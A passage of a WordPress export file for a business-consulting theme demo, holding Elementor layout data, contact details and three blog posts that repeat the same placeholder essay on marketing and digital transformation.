Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#55BB53","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4ffbddf","elType":"widget","settings":{"title":"Contacts","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"ecb740e","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"b0441a2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"00f028b","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9c23145","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"758fa65","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"d84b707","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1aa5536","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7cf28b7","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"c141a94","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home4.jpg","id":2076},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"67d5418","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"background_background":"classic","padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"10a88aa","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"9ea99fd","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#55BB53","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"7edf81e","elType":"column","settings":{"_column_size":50,"_inline_size":18,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"5b53277","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Full_White.svg","id":1956},"image_size":"full","align":"left","width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"f6065ba","elType":"column","settings":{"_column_size":50,"_inline_size":82,"_inline_size_tablet":100},"elements":[{"id":"bd27162","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:4;s:10:"image_size";i:4;s:5:"align";i:2;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:5;s:11:"header_size";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;s:22:"typography_font_weight";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:7;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:4;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:2;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[300]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Entering the Next Phase of Digital Transformation</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/entering-the-next-phase-of-digital-transformation/</link>
		<pubDate>Mon, 18 Dec 2017 04:13:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=413</guid>
		<description></description>
		<content:encoded><![CDATA[<p><span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.</p>
<p><span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em></p>
<p><img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" /></p>
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.</p>
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”<br /><cite>DAVID OSWALD</cite></p>
</blockquote>
<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.</p>
<p><em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em></p>

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>413</wp:post_id>
		<wp:post_date><![CDATA[2017-12-18 04:13:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2017-12-18 04:13:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_format" nicename="post-format-audio"><![CDATA[Audio]]></category>
		<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="trading"><![CDATA[trading]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_audio]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/139083759]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[digital-transformation-roadmap-enablers]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>In Media, Trimming Costs Boosts Value Transform</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/in-media-trimming-costs-boosts-value-transform/</link>
		<pubDate>Tue, 09 Jan 2018 08:49:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=423</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>423</wp:post_id>
		<wp:post_date><![CDATA[2018-01-09 08:49:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-01-09 08:49:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-link"><![CDATA[Link]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>The Future of Retail: Asia’s Ecosystems</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/the-future-of-retail-asias-ecosystems/</link>
		<pubDate>Mon, 24 Feb 2020 09:00:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=430</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #55bb53;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
